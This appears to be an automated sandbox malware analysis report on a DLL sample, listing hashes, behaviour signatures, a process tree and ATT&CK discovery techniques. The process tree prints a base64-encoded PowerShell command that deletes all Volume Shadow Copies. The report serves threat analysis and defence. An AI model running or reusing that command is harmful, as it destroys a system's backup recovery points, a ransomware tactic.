Analysis

  • max time kernel
    119s
  • max time network
    136s
  • platform
    windows10_x64
  • resource
    win10-en-20211208
  • submitted
    24-01-2022 02:06

General

  • Target

    4feb24617e5ff8916f4b3a0c47938dc1d5d52fe4ad9fc275709db0e0d9c2d458.dll

  • Size

    149KB

  • MD5

    53507353657f2064e6a82395aa56e929

  • SHA1

    115610c36ba871903fe085ebe96fa6e1226f5fbd

  • SHA256

    4feb24617e5ff8916f4b3a0c47938dc1d5d52fe4ad9fc275709db0e0d9c2d458

  • SHA512

    72bf5d4ecc80d51ab653193661aba5c0cd6aef6c01187a7020b28cc51f32b5ce8efe3b44b8236f9b39f8a857a3c260f13e94a74ca8b287a9d716d040288cf7c4

Score
6/10

Malware Config

Signatures

  • Enumerates connected drives 3 TTPs 24 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 5 IoCs

Processes

  • C:\Windows\system32\rundll32.exe
    rundll32.exe C:\Users\Admin\AppData\Local\Temp\4feb24617e5ff8916f4b3a0c47938dc1d5d52fe4ad9fc275709db0e0d9c2d458.dll,#1
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2716
    • C:\Windows\SysWOW64\rundll32.exe
      rundll32.exe C:\Users\Admin\AppData\Local\Temp\4feb24617e5ff8916f4b3a0c47938dc1d5d52fe4ad9fc275709db0e0d9c2d458.dll,#1
      2⤵
      • Enumerates connected drives
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2736
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4088
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:3036

Network

MITRE ATT&CK Matrix ATT&CK v6

Discovery

Query Registry

1
T1012

Peripheral Device Discovery

1
T1120

System Information Discovery

1
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/4088-218-0x000001B725520000-0x000001B725522000-memory.dmp
    Filesize

    8KB

  • memory/4088-219-0x000001B725523000-0x000001B725525000-memory.dmp
    Filesize

    8KB

  • memory/4088-220-0x000001B725430000-0x000001B725452000-memory.dmp
    Filesize

    136KB

  • memory/4088-239-0x000001B727600000-0x000001B727676000-memory.dmp
    Filesize

    472KB